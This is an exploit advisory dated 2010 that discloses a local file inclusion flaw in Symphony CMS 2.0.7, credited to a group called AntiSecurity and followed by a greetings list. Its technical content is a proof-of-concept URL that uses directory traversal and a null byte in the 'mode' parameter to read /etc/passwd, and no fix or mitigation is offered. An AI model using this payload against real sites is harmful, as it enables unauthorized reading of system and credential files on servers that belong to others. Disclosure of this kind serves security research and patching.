Symphony CMS v2.0.7 Local File Inclusion Vulnerability

2010-05-30 09:27:37


=============================================================================================================


[o] Symphony CMS Local File Inclusion Vulnerability

Software : Symphony CMS version 2.0.7
Download : http://symphony-cms.com/download/releases/current/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/


=============================================================================================================


[o] Exploit

http://localhost/[path]/index.php?mode=[LFI]


[o] PoC

http://localhost/index.php?mode=../../../../../../../../../../../../../../../etc/passwd%00


=============================================================================================================


[o] Greetz

Angela Zhang stardustmemory aJe martfella Genex
H312Y }^-^{ matthews wishnusakti xrootboy
k1tk4t str0ke kaka11 inc0mp13te pizzyroot
ArRay bjork xmazinha veter f1
all people in #evilc0de [at] irc.byroe.net


=============================================================================================================


[o] May 30 2010 - GMT +07:00 Jakarta, Indonesia

Fixes

No fixes

In order to submit a new fix you need to be registered.